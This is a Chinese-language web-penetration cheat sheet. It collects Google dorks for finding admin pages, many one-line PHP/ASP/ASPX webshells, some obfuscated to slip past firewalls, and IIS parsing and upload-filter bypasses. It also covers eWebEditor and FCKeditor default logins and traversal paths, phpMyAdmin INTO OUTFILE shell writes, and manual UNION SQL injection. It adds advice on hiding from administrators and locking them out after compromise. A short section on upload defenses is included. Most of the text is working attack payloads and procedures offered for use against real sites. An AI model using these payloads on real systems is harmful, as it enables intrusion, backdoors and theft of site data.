【 谷歌黑客语法 】 site：可以限制你搜索范围的域名. inurl：用于搜索网页上包含的URL，这个语法对寻找网页上的搜索，帮助之类的很有用. intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字) intitle: 查包含关键词的页面，一般用于社工别人的webshell密码 filetype：搜索文件的后缀或者扩展名 intitle：限制你搜索的网页标题. link: 可以得到一个所有包含了某个指定URL的页面列表. 查找后台地址：site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms 查找文本内容：site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username 查找可注入点：site:域名 inurl:aspx|jsp|php|asp 查找上传漏洞：site:域名 inurl:file|load|editor|Files 找eweb编辑器：site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit 存在的数据库：site:域名 filetype:mdb|asp|# 查看脚本类型：site:域名 filetype:asp/aspx/php/jsp 迂回策略入侵：inurl:cms/data/templates/images/index/ 利用谷歌黑客快速找到自己想要的资料：site:qiannao.com 提权视频 ============================================================================================================================================================= 【 一句话木马 】 asp一句话木马：<%eval request(“x”)%> php一句话木马：<?php eval($_POST[g]);?> aspx一句话：<%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%> 数据库加密一句话(密码a)：┼攠數畣整爠煥敵瑳∨≡┩愾 网站配置、版权信息专用一句话：”%><%Eval Request(x)%> 一句话再过护卫神：<%Y=request(“x”)%> <%execute(Y)%> 过拦截一句话木马：<% eXEcGlOBaL ReQuEsT(“x”) %> asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><% 能过安全狗的解析格式：;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg 突破安全狗的一句话：<%Y=request(“x”)%> <%eval(Y)%> elong过安全狗的php一句话：<?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ?> 后台常用写入php一句话（密码x）： <? $fp = @fopen(“c.php”, ‘a’); @fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”); @fclose($fp); ?> 高强度php一句话： <?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?> 新型变异PHP一句话(密码b4dboy): ($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’); 突破安全狗的aspx一句话： <%@ Page Language=”C#” ValidateRequest=”false” %> <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> 突破护卫神，保护盾一句话： <?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["test"]); ?> 许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传，这样一句话木马就写入不进数据库了。 改成：〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉 这样就避开了使用〈%%〉，保存为.ASP,程序照样执行的效果是一样的。 PHP高强度一句话： <?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?> 菜刀连接：/x.php?x=lostwolf 脚本类型：php 密码：c <?php assert($_REQUEST["c"]);?> 菜刀连接 躲避检测 密码：c ============================================================================================================================================================= 【 解析漏洞总结 】 IIS 6.0 目录解析：/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt)，文本内容为后门代码 IIS6.0 会将 xx.jpg 解析为 asp 文件。 后缀解析：/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0 都会把此类后缀文件成功解析为 asp 文件。 默认解析：/xx.asa /xx.cer /xx.cdx IIS6.0 默认的可执行文件除了 asp 还包含这三种 此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg IIS 7.0/IIS 7.5/Nginx <8.03 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。 常用利用方法： 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾 e.g. copy xx.jpg/b + yy.txt/a xy.jpg /b 即二进制[binary]模式 /a 即ascii模式 xx.jpg正常图片文件 yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?> 意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件 找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址，在地址后加上 /xx.php 即可执行恶意文本。 .然后就在图片目录下生成一句话木马 shell.php 密码 cmd ============================================================================================================================================================= 【 ewebeditor编辑器 】 默认后台：ewebeditor/admin_login.asp 帐号密码：admin admin 样式设计：ewebeditor/admin_style.asp 查看版本：ewebeditor/dialog/about.html 数据库路径：db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名) 遍历目录：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../.. 跳转目录：ewebeditor/admin_uoloadfile.asp？id=14&dir=.. (dir为列目录, ..为返回上层目录)，形式:dir ../.. 点上传文件管理-随便选择一个样式目录，得到：ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减) ( ewebeditor5.5版本 ) 默认后台：ewebeditor/admin/login.asp 帐号密码：admin 198625 数据库路径：data/%23sze7xiaohu.mdb 遍历目录：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../ 调用样式上传页面：ewebeditor/ewebeditor.htm?id=body&style=popup ( ewebeditor3.8 php版本 ) 默认后台：eWebEditor/admin/login.php 首先随便输入一个帐号和密码，接着系统会提示出错，这时清空浏览器的url，然后输入以下代码后连按三次回车键： javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”)); 接着访问文件：ewebeditor/admin/default.php 就可以直接进入后台了。 ( ewebeditor编辑器exp手册 ) 有时候什么后缀都上传了，还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试 一：文件上传成功了，但是访问不成功，说明该目录(比如：/UploadFile)被设置了权限，返回去换成/ 上传到根目录就行了.增加asp等不行的时候，可以利用解析asp;jpg 二：下载数据库查看前人留下的痕迹，再访问上传页面拿shell。 页面路径：/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目，把S_ID跟S_Name的值替换在语句里访问，上传相对应的格式木马。 ============================================================================================================================================================= 【 fckeditor编辑器 】 查看版本：fckeditor/editor/dialog/fck_about.html FCKeditor/_whatsnew.html 编辑器页面：FCKeditor/_samples/default.html 上传页面：fckeditor/editor/filemanager/connectors/test.html /editor/editor/fckeditor.html FCKeditor/editor/filemanager/connectors/aspx/connector.aspx FCKeditor/editor/filemanager/connectors/uploadtest.html 遍历目录：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/ 编辑页面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp 查看文件上传路径：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= ( 拿shell方法总结 ) ASPX的站几乎都用fck编辑器，建议用工具扫一下，记住inc目录下可能存在fck编辑器，扫下这个目录。 一：如果是iis6.0，上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录，再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell 二：第一次上传1.asp;1.jpg，被重命名为：1_asp;1.jpg，但是第二次上传1.asp;1.jpg，就有可能变成：1.asp;1(1).jpg 三：iis7.5+fck的解析文件为：a.aspx.a;.a.aspx.jpg..jpg.aspx 四：如果不是iis6.0 上传1.asp;jpg然后抓包，接下来改包，将分号变成空格，再用c32把20改成00，保存，利用%00 截断分号两次 五：成功访问别人的一句话木马页面，http://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg 但不知道密码 http://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马，没有成功利用iis6.0解析漏洞还是图片，下载下来用记事本打开找到密码。 六：IIS7.0/7.5 通杀oday，把php一句话木马后缀改成1.jpg传上去，找出一句话的路径后，在1.jpg的后面添加/.php 例如：http://www.xxx.com/iges/php.jpg/.php ( 建立文件夹 . 变 _ 的突破方法 ) 利用Fiddler web debugger 这款工具来进行修改数据包，从而达到突破的目的。 注意：安装Fiddler web debugger，需要安装.net环境以及.net的SP2补丁方可运行！ 1.打开fck的上传页面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html 2.再打开Fiddler web debugger这款工具，点击设置–自动断点–选择 “请求之前” 3.接着打开fck的上传页面，创建文件夹，并输入你想要创建的文件名，例如：x.asp 4.然后返回到Fiddler web debugger这款工具里，选择链接–点击右侧的嗅探 5.修改currentfolder内的参数，改成你要建立的文件夹名字，如：x.asp 6.然后点击右侧的：run to completion 7.再点击软件设置–自动断点–禁用，再到浏览器里点击确定建立文件夹，你就会发现文件夹建立为x.asp了 ============================================================================================================================================================= 【 linux 】 解析格式：1.php.xxx (xxx可以是任意) 如果apache不认识后缀为rar的文件，我们就用1.php.rar格式上传，文件就会被服务器当做PHP脚本解析。 辨别linux系统方法，例如：http://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问，如果出错了，就说明是linux系统，反之是windows系统. ============================================================================================================================================================= 【 旁注 】 旁注的技巧就是挑选支持aspx的站来日，这样提权时候希望较大，如何探测服务器上哪些站点支持aspx呢? 利用bing搜索：http://cn.bing.com/ 搜索格式：ip:服务器ip aspx 比如要入侵一个网站，想知道该网站支不支持aspx，就在网站后面随便加上一个xxx.aspx回车，如果显示的不是iis默认的错误页面，而是这种：“/”应用程序中的服务器错误，说明支持aspx马。 ============================================================================================================================================================= 【 phpmyadmin 】 查看版本：test.php 或 phpinfo.php 默认账号密码：root root 万能帐号密码：’localhost’@'@” 密码空 拿shell第一种方法： CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL ); INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php @eval($_POST[pass]);?>’); SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/darkmoon.php’; DROP TABLE IF EXISTS `darkmoon`; 拿shell第二种方法： Create TABLE moon (darkmoon text NOT NULL); Insert INTO moon (darkmoon) VALUES(‘<?php @eval($_POST[pass]);?>’); select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’; Drop TABLE IF EXISTS moon; 拿shell第三种方法： select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’ 拿shell第四种方法 select ‘<?php echo \’<pre>\’;system($_GET[\'cmd\']); echo \’</pre>\’; ?>’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’ 127.0.0.1/darkmoon4.php?cmd=net user 找到mysql数据库，执行sql语句即可写入一句话，再菜刀连接即可。 phpmyadmin脱裤：在这里面是可以直接拖库的，如同上传php拖库脚本一样，操作差不多的。 修改mysql默认的root用户名方法: 进入phpmyadmin,进入mysql表,执行sql语句 1.update user set user=’你的新root用户名’ where user=’root’; 2.flush privileges; 例如： 用root身份登入，进入mysql库，修改user表即可。 1.use mysql; 2. 3.mysql>update user set user=’newName’ where user=’root’; 4. 5.mysql> flush privileges; =============================================================================================================================================================

文件上传漏洞

1.本地验证

本地验证：客户端本地通过前台JS脚本进行检测。

原理：

当用户在客户端选择文件点击上传的时候，客户端会在向服务器发送请求之前，就先对将上传的本地文件类型进行检测，来判断是否是可以上传的类型，这种方式称为前台脚本检测，即本地验证。
如何判断是本地验证呢？很多情况下感觉速度较快的返回信息则认为有可能是本地验证，但是有的时候需要根据抓报以及跟踪上传代码来分析出是否为本地验证。

绕过：

绕过前台脚本检测扩展名，就是要使检测函数失效。
- 可以绕过检测规则；
- 可以修改检测规则；
- 在数据传输中修改数据包内容。

1. 绕过检测规则

检查网页源码，看能否找到文件上传点附近调用检测函数的痕迹。

像这里我们能看到onsubmit="return checkFile()"就是调用了检测函数。
我们可以采取直接修改前台代码的方式。取消检测函数的调用，再进行文件上传。
注意：这种修改只是在本地上修改，是临时的，刷新页面即可还原。

还有一种绕过方式，就是干脆在本地浏览器客户端禁用JS。可使用火狐浏览器的NoScript插件、IE中禁用掉JS等方式实现。

2. 修改检测规则

检查网页源码，看能否找到文件过滤函数。

如果找到了，我们就可以通过直接修改这个JS函数，使它能够上传我们需要的文件。
注意：这种修改只是在本地上修改，是临时的，刷新页面即可还原。

3. 修改数据包

首先将所要上传文件的扩展名更改为符合脚本检测规则的扩展名，通过BurpSuite等抓包工具，截取数据包，并将数据包中文件扩展名更改为所需要的扩展名，达到绕过的目的。

例如:文件名本来为【evil.jpg】，上传时，用BurpSuite截包后，将数据包中的名字改为【evil.php】(或其它脚本类型)即可。

2.MIME类型检测绕过漏洞

服务器端根据 content-type 类型检测，如果是白名单允许的，则可以正常上传，否则上传失败。

MIME

MIME:客户端软件，区分不同种类的数据，例如web浏览器就是通过MIME类型来判断文件是GIF图片，还是可打印的PostScript文件。web服务器使用MIME来说明发送数据的种类， web客户端使用MIME来说明希望接收到的数据种类。

MIME检测原理

服务端MIME类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法的。

示例代码的功能是服务端用来处理文件上传的，在第二行中if语句对上传文件的type判断是否为image/gif。

在代码中检测的type值，对应http包中的字段Content-Type的值。也就是所我们可以伪装上传文件的type值，来绕过服务端的MIME检测

绕过：

修改content-type 参数欺骗绕过。

防御：

根据攻击原理，有以下几点应该注意：
1：文件上传的目录设置为不可执行
只要web容器无法解析该目录下的文件，即使攻击者上传了脚本文件，服务器本身也不会受到影响，因此此点至关重要。实际中，很多大型网站的上传应用，文件上传后会放到独立的储存上，做静态处理。但对一些小应用，如果存在上传功能，则仍需要多加关注
2：判断文件类型：
判断文件类型时，应结合MIME Type、后缀检查等方式。推荐使用白名单，黑名单的方式已经无数次被证明不可靠。此外，针对图片处理，可以使用压缩函数或者resize函数，在处理图片的同事破坏掉图片中可能包含的HTML代码。
3：使用随机数改写文件名和文件路径
文件上传如果要执行代码，则需要用户能够访问到这个文件。在某些环境中，用户能上传，但不能访问。如果应用使用随机函数改写了文件名和路径，将极大增加攻击成本。与此同时，像1.php.rar.rar、或者1.xml这种文件，都因为文件名被改写而无法成功实施攻击

3. 文件扩展名绕过漏洞

应用场景：服务端验证绕过(扩展名检测)，一般用于绕过黑名单检测。
黑名单检测 黑名单的安全性其实还没白名单的安全性高，至少攻击它的方式比白名单多多了。
一般有个专门的 blacklist 文件，里面会包含常见的危险脚本文件。

1）. 找黑名单扩展名的漏网之鱼

比如上面就漏掉了 asa 和 cer 之类。

2）. 可能存在大小写绕过漏洞

比如 aSp 和 pHp 之类。
用于只将小写的脚本后缀名(如php)过滤掉的场合。

3）双写后缀名绕过

用于只将文件后缀名，例如”php”字符串过滤的场合；
例如:上传时将Burpsuite截获的数据包中文件名【evil.php】改为【evil.pphphp】，那么过滤了第一个”php”字符串”后，开头的’p’和结尾的’hp’就组合又形成了【php】。

4）. 特别文件名构造

比如发送的 http 包里把文件名改成 help.asp. 或 help.asp_(下划线为空 格)，这种命名方式在 windows 系统里是不被允许的，所以需要在 burp 之类里进行修改，然 后绕过验证后，会被 windows 系统自动去掉后面的点和空格。

了解php扩展名解析原则

可以被解析成PHP文件的后缀名有php4，phtml，phps，等。
通过修改后缀，绕过黑名单检测。

5）. IIS 或 nginx 文件名解析漏洞http://blog.csdn.net/xavierdarkness/article/details/78118767
4.文件内容检测绕过类上传漏洞

在真实图片中插入一句话木马，绕过内容检测。

5. 空字节截断目录路径检测绕过类上传漏洞 （00截断）

即 利用文件系统00截断—绕过

原理

在上传的时候，当文件系统读到 0x00 时，会认为文件已经结束。
利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格，产生0x00上传截断漏洞。

绕过方法

通过抓包截断将【evil.php.jpg】后面的一个【.】换成【0x00】。在上传的时候，当文件系统读到【0x00】时，会认为文件已经结束，从而将【evil.php.jpg】的内容写入到【evil.php】中，从而达到攻击的目的。

上传漏洞防御：

1.客户端检测，使用JS对上传图片检测，包括文件大小、扩展名、文件类型等
2.服务端检测，对文件大小、路径、扩展名、类型、文件内容检测、对文件重命名
3.其他限制，服务器端上传目录设置不可执行权限。

渗透笔记大全

【 拿shell 】
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马，不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls
2.上传图片木马遇到拦截系统，连图片木马都上传不了，记事本打开图片木马在代码最前面加上gif89a，一般就能逃过拦截系统了。
3.上传图片木马把地址复制到数据库备份里备份成asp木马，有时不成功就利用IIs6.0解析漏洞尝试突破。
4.上传图片木马再用抓包工具进行抓包，用明小子的综合上传功能，复制上传地址及cookies填到对应的框里，点击上传即可。

5.当后台有数据库备份蛋没有上传点时，把一句话木马插到任意处，再到数据库备份里备份成asp木马，之后用一句话客户端连接木马即可。

6.后台点击修改密码，新密码设置为：1″:eval request(“h”)’设置成功后连接asp/config.asp即可拿下shell

7.当页面提示“上传格式不正确[重新上传]” 则说明存在上传漏洞，复制地址放到明小子里上传，一般都能直接拿下shell。
8.当后台没有数据库备份但有数据库恢复的情况下，请不要犹豫，数据库恢复跟数据库备份功能是一样的，直接邪恶吧。
9.如果知道网站的数据库是asp的，直接在前台找留言板插入一句话木马，连接配置文件inc/config.asp即可拿下shell。
10.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点，有的话直接上传asp木马以及利用iis6.0解析漏洞，不行就抓包用明小子上传。
11.先上传一个.ashx的文件，在笔记里搜索可找到方法，结果是访问会生成一句话木马文件，后台上传、编辑器上传、上传漏洞页面均可使用此方法。
12.当页面提示只能上传jpg|gif|png等格式的时候，右键查看源文件，本地修改为asp|asa|php再本地上传即可拿下shell。
13.当用啊D检测注入点提示SA权限或DB权限的时候，尝试列目录找到网站物理路径，再点击cmd/上传，直接上传asp木马即可，不行就差异备份拿shell。
14.对于一些上传漏洞的上传页面，以及后台找到的上传页面，可以尝试用本地双文件上传突破，第一个选jpg第二个选cer，推荐使用火狐浏览器。
=============================================================================================================================================================
【 渗透技巧 】
1.某些cms的网站设置过滤不严，直接在网站后面加上admin/session.asp 或 admin/left.asp 可以绕过后台验证直接进去后台。
2.提下服务器之后建议抓下管理员哈希值，然后删除所有用户包括自己的，以后登录这台服务器就用管理员的账号密码登录，这样比较安全。
3.入侵网站之前连接下3389，可以连接上的话先尝试弱口令，不行就按5次shift键，看看有没有shift后门。
4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里，选择浏览器-拦截跳转勾选–查看即可直接进入后台。
5.突破防盗链系统访问shell代码：javascript:document.write(“<a href=’http://www.xxx.com/uploadfile/1.asp‘>fuck</a>”) 点击GO即可进入shell。
6.遇到一流信息监控拦截系统时，上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。
7.eweb编辑器后台，增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了，尝试增加一个aaspsp，再上传asp就会解析了。
8.用注入工具猜解到表段却猜解不到字段的时候，到网站后台右键查看源文件，一般账号密码后面的就是字段，之后在注入工具里添加字段进行猜解即可。
9.当注入工具猜解表段，但猜解字段时提示长度超过50之类，不妨扔到穿山甲去猜解一下。
10.得知表段跟字段之后，使用SQL语句在ACCESS数据库里加个用户名及密码的语句：Insert into admin(user,pwd) values(‘jianmei’,'daxia’)
11.当获得管理员密码却不知道管理员帐号时，到网站前台找新闻链接，一般“提交者”“发布者”的名字就是管理员的帐号了。
12.爆破ASP+IIS架设的网站web绝对路径，假设网站主页为：http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/，fkbhvv.aspx是不存在的。
13.有的站长很懒什么也不改，当我们得知网站的cms的时候，不妨去下载一套找找数据库路径，以及敏感信息，再尝试默认相关的可利用资源。
14.菜刀里点击一句话木马右键，选择虚拟机终端，执行命令出现乱码时，返回去设置编码那里，将默认的GB2312改为UTF-8.
15.入侵千万别忘了ftp，试试诺口令，ftp的默认端口：21  默认帐号密码：test
16.破解出md5为20位结果，只需要把前三位和后一位去掉，剩余16位拿去解密即可
17.好多网站的后台地址是：admin_index.asp manage_login.asp
18.有时在木马代码里加上了gif89a，上传成功访问的时候却出现了像图片一样的错误图像，说明服务器把gif89a当做图片来处理了，不要带gif89a即可。问就可以了。
19.找eweb编辑器的时候，如果默认的被改了，到前台去找图片右键看下路径，根据图片的目录猜eweb编辑器的目录，后台也是用此思路。
20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\
21.扫旁站的时候，是不是想看每个站点是什么cms呢？用轩辕剑扫描就可以显示系统特征。
22.网站的主站一般都很安全，这时就要旁注或C段了，但是想知道各个IP段开放了什么端口吗？用“啊D网络工具包”里面的IP端口扫描最理想了。
23.手工检测注入点弹出“你的操作已被记录!”之类的信息，访问这个文件：sqlin.asp，如果存在，在注入点后面植入一句话木马：‘excute(request(“TNT”))
接着用一句话木马客户端连接：http://www.xxx.com/sqlin.asp，上传木马即可拿下shell，因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。
24.有的后台不显示验证码，往注册表里添加一个ceg即可突破这个困境了，把下面的代码保存为Code.reg，双击导入就可以了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
“BlockXBM”=dword:00000000
25.内网渗透时尽量少登录3389，以免被管理员发现；
26.旁注的时候，建议挑php的站点来日，因为php站点一般都支持aspx脚本，这样对于提权跟跨目录都轻松.!

=============================================================================================================================================================
【 手工注入 】
IE浏览器-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉，否则不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的信息。
手工注入时如果网站过滤了 and 1=1  and 1=2 ，可以用xor 1=1  xor 1=2 进行判断。
第一步：找注入点
（数字型）http://www.xxx.com/show.asp?id=7
加’           程序报错
加and 1=1     返回正常页面
加and 1=2     返回错误页面
（字符型）http://www.xxx.com/show.asp?id=ade7
加’            程序报错
加’and ’1′=’1  返回正常页面
加’and ’1′=’2  返回错误页面
新型检测注入点的方法：
在URL地址后面加上-1，若返回的页面和前面不同，是另一个正常的页面，则表示存在注入漏洞，而且是数字型的注入漏洞。
在URL地址后面加上-0，若返回的页面和之前的页面相同，然后加上-1，返回错误页面，则也表示存在注入漏洞，而且是数字型的。
如果报错提示这个：
Microsoft JET Database Engine 错误 ’80040e14′
语法错误 (操作符丢失) 在查询表达式 ‘ID = 6 ord by’ 中。
/fun/Function.asp，行 657
解明：通过 JET 引擎连接数据库，则是 Access数据库，通过 ODBC 引擎连接数据库，则是 MSSQL数据库。

第二步：猜字段数
语句：order by 5
如果猜6的时候返回出错，就继续往回猜，直到返回正确为止…
第三步：UNION命令
语句：and 1=2 union select 1,2,3,4,5–
看看哪里可以替换，假如显示有2，就在2这里替换SCHEMA_NAME，见下
第三步：猜库名
语句：and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1
第四步：猜表段
语句：and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1
注意，TABLE_SCHEMA=后面的库名必须是hex转换过的格式，倒数第二个1一直替换，直到爆出所有表段，然后选最可能性的那个。
第五步：猜字段
and 1=2 union select 1,COLUMN_NAME,3,4,5 from  information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1
注意，TABLE_SCHEMA=后面的表段必须是hex转换过的格式，倒数第二个1一直替换，直到爆出所有字段，然后选最可能性的那两个。
第六步：猜内容
语句一：and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
首先让程序报错，所以在注入点后面加上 and 1=2
语句二：http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin
同样是先让程序报错，在178这个参数前面加上 -
当列名帐号跟列名密码都猜解对的时候，页面将会显示相对应的内容，一般的密码都经过MD5加密了，解密地址：http://www.cmd5.com/;  UserName  Password
=============================================================================================================================================================
【 常见网站程序 】
asp类：
foosun(风讯)
kesion(科汛)

newasp(新云)

乔客

CreateLive(创力)

5uCMS

KingCMS

DvBBS(动网)

BBSxp

[博客]zblog

[博客]pjblog

PHP类：

DeDeCms（织梦）

ECMS（帝国）

PHPCMS